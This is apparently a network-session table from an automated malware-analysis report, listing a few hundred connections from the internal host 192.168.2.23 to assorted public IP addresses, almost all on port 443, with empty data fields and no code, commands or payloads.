                                                16150192.168.2.2335440153.59.168.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16151192.168.2.2333084122.129.174.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16152192.168.2.234415214.253.57.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16153192.168.2.2346644198.55.196.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16154192.168.2.235296814.151.250.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16155192.168.2.2345414201.202.150.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16156192.168.2.235856064.43.107.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16157192.168.2.2337740205.144.135.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16158192.168.2.2345894212.5.53.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16159192.168.2.2351854157.213.192.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16160192.168.2.2357244113.170.235.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16161192.168.2.234140232.168.186.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16162192.168.2.2334316223.124.104.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16163192.168.2.2358462177.38.148.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16164192.168.2.2342838157.244.211.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16165192.168.2.2350856181.212.81.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16166192.168.2.23609468.192.250.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16167192.168.2.2349882132.211.248.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16168192.168.2.2346066163.11.240.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16169192.168.2.2340764170.97.208.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16170192.168.2.2358152154.244.16.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16171192.168.2.2343976207.150.203.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16172192.168.2.2354302131.189.1.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16173192.168.2.2354416221.11.169.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16174192.168.2.2352868119.79.113.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16175192.168.2.2350936139.186.183.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16176192.168.2.2337028196.200.72.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16177192.168.2.2355778176.90.14.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16178192.168.2.233295423.227.199.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16179192.168.2.235360261.111.21.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16180192.168.2.2344856188.79.156.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16181192.168.2.235410859.139.55.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16182192.168.2.234913460.151.119.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16183192.168.2.2346450154.86.12.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16184192.168.2.2343728101.4.14.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16185192.168.2.2348684100.216.86.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16186192.168.2.2343858129.18.224.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16187192.168.2.2336610209.160.249.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16188192.168.2.2336142154.152.192.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16189192.168.2.2356000191.217.152.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16190192.168.2.2351462169.105.174.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16191192.168.2.235751640.157.154.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192192.168.2.2341124135.104.125.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16193192.168.2.234394880.122.69.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16194192.168.2.2342656205.89.215.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16195192.168.2.2359766129.182.153.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16196192.168.2.2358476123.23.27.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16197192.168.2.2353744202.184.60.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16198192.168.2.233877417.236.245.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16199192.168.2.2359066187.173.112.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16200192.168.2.234917491.132.96.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16201192.168.2.2351844163.201.80.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16202192.168.2.2360186150.50.106.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16203192.168.2.2352638163.193.58.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16204192.168.2.2336994100.147.109.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16205192.168.2.2342848153.83.37.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16206192.168.2.235045664.83.142.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16207192.168.2.2339640104.216.93.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16208192.168.2.2356702153.254.253.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16209192.168.2.2356752181.156.63.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16210192.168.2.2345720180.28.192.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16211192.168.2.233699035.117.115.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16212192.168.2.2356170122.177.121.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16213192.168.2.2360152116.197.163.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16214192.168.2.2359888108.20.229.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16215192.168.2.234711046.14.149.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16216192.168.2.23442342.65.217.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16217192.168.2.2343890130.208.25.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16218192.168.2.233528434.226.48.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16219192.168.2.235496031.59.0.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16220192.168.2.2342376194.176.54.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16221192.168.2.233660077.34.54.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16222192.168.2.2341520139.226.140.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16223192.168.2.233724458.6.145.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16224192.168.2.233810460.136.115.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16225192.168.2.235417868.48.149.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16226192.168.2.2355978182.79.120.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16227192.168.2.233933832.168.109.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16228192.168.2.2352530168.47.167.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16229192.168.2.234090682.195.49.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16230192.168.2.233838643.137.213.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16231192.168.2.2335244208.91.0.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16232192.168.2.23497809.193.204.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16233192.168.2.2335808149.155.188.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16234192.168.2.2344348164.235.116.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16235192.168.2.2332896188.239.90.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16236192.168.2.234547223.89.129.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16237192.168.2.2341874118.247.162.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16238192.168.2.234843894.22.28.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16239192.168.2.2347424140.246.111.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16240192.168.2.2356248111.12.187.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16241192.168.2.2340018112.8.36.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16242192.168.2.2335474150.134.213.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16243192.168.2.235716050.100.119.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16244192.168.2.2342234131.38.129.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16245192.168.2.2337770119.156.194.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16246192.168.2.233915280.67.156.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16247192.168.2.235748837.22.173.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16248192.168.2.2337908210.221.183.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16249192.168.2.234908434.102.129.8437215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16250192.168.2.235418886.28.228.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16251192.168.2.2335766207.65.149.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16252192.168.2.233572273.163.91.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16253192.168.2.2342286104.140.4.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16254192.168.2.2359766133.101.46.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16255192.168.2.234613661.172.31.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16256192.168.2.2347898109.31.158.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16257192.168.2.235157459.91.72.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16258192.168.2.235977869.75.144.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16259192.168.2.2357516223.108.7.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16260192.168.2.2348088196.87.43.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16261192.168.2.234934642.177.143.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16262192.168.2.2357230179.236.255.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16263192.168.2.2355088133.163.28.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16264192.168.2.2346786165.254.197.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16265192.168.2.23426909.203.91.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16266192.168.2.2335986169.70.137.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16267192.168.2.2332964122.239.50.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16268192.168.2.234183244.7.74.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16269192.168.2.2350996118.20.189.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16270192.168.2.2354910134.248.85.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16271192.168.2.2345476102.102.145.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16272192.168.2.2357742113.77.218.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16273192.168.2.2344032135.97.18.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16274192.168.2.2355014132.2.194.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16275192.168.2.233482646.237.58.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16276192.168.2.234328443.162.14.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16277192.168.2.2336492137.131.48.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16278192.168.2.233977697.168.45.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16279192.168.2.2350654177.67.47.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16280192.168.2.2347096192.25.240.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16281192.168.2.233380676.1.16.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16282192.168.2.2354074190.69.32.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16283192.168.2.2360844100.3.120.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16284192.168.2.2341992135.38.116.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16285192.168.2.235611025.125.165.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16286192.168.2.2338856179.84.92.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16287192.168.2.2355786223.83.250.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16288192.168.2.2357104204.93.250.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16289192.168.2.2352872160.133.97.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16290192.168.2.234484057.108.179.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16291192.168.2.2355736182.33.101.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16292192.168.2.2355036175.25.173.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16293192.168.2.2348430103.94.196.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16294192.168.2.235079031.76.11.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16295192.168.2.235637068.97.33.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16296192.168.2.2341120121.157.204.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16297192.168.2.234126497.117.45.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16298192.168.2.233596865.147.212.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16299192.168.2.2354254140.248.17.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16300192.168.2.233615663.159.32.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16301192.168.2.2346394175.21.145.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16302192.168.2.2357190109.26.80.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16303192.168.2.235476046.11.50.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16304192.168.2.2359844182.95.171.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16305192.168.2.236005271.183.163.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16306192.168.2.2348716107.12.76.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16307192.168.2.2355802213.79.213.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16308192.168.2.234746261.159.173.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16309192.168.2.2358626178.254.68.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16310192.168.2.233345817.20.87.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16311192.168.2.2339968102.180.37.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16312192.168.2.2338132170.153.66.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16313192.168.2.2350784186.87.124.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16314192.168.2.2350484140.52.18.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16315192.168.2.233408899.168.243.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16316192.168.2.2334898169.254.211.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16317192.168.2.2338278102.137.225.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16318192.168.2.234413681.60.160.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16319192.168.2.2357076123.216.165.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16320192.168.2.2348362209.7.238.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16321192.168.2.235373269.91.130.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16322192.168.2.2332842101.70.83.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16323192.168.2.2355894170.249.173.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16324192.168.2.235405661.68.176.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16325192.168.2.2347010142.97.244.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16326192.168.2.2344680169.177.145.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16327192.168.2.23494129.100.234.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16328192.168.2.2350600188.149.150.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16329192.168.2.2360560166.8.247.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16330192.168.2.2360908137.151.167.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16331192.168.2.2359442216.224.192.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16332192.168.2.2335504219.69.137.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16333192.168.2.2336256199.15.108.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16334192.168.2.2335822190.149.65.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16335192.168.2.2344158216.36.63.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16336192.168.2.233843037.57.185.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16337192.168.2.2337802119.227.176.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16338192.168.2.235757851.119.37.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16339192.168.2.234153863.4.253.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16340192.168.2.2337278105.5.203.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16341192.168.2.233928648.182.77.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16342192.168.2.2346794133.243.193.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16343192.168.2.2360946151.104.142.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16344192.168.2.2360968167.19.250.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16345192.168.2.23395402.92.133.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16346192.168.2.233958878.83.176.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16347192.168.2.2341350216.132.45.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16348192.168.2.2340308115.159.156.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16349192.168.2.234487296.13.0.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16350192.168.2.2333166162.146.228.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16351192.168.2.2343432161.223.51.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16352192.168.2.234464466.135.200.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16353192.168.2.234062854.53.203.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16354192.168.2.2333816109.11.110.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16355192.168.2.234949823.125.246.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16356192.168.2.234406473.161.202.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16357192.168.2.2342540167.25.101.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16358192.168.2.2336296121.130.174.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16359192.168.2.2359534163.189.132.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16360192.168.2.233637479.85.87.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16361192.168.2.2336102111.7.180.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16362192.168.2.235286627.35.203.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16363192.168.2.235845079.196.12.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16364192.168.2.2339490147.38.19.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16365192.168.2.2333622222.71.118.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16366192.168.2.2353404201.102.4.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16367192.168.2.234004492.75.199.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16368192.168.2.2360836190.43.209.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16369192.168.2.2345584216.211.62.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16370192.168.2.2348108171.32.166.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16371192.168.2.234646468.134.228.173443
                                                TimestampBytes transferredDirectionData


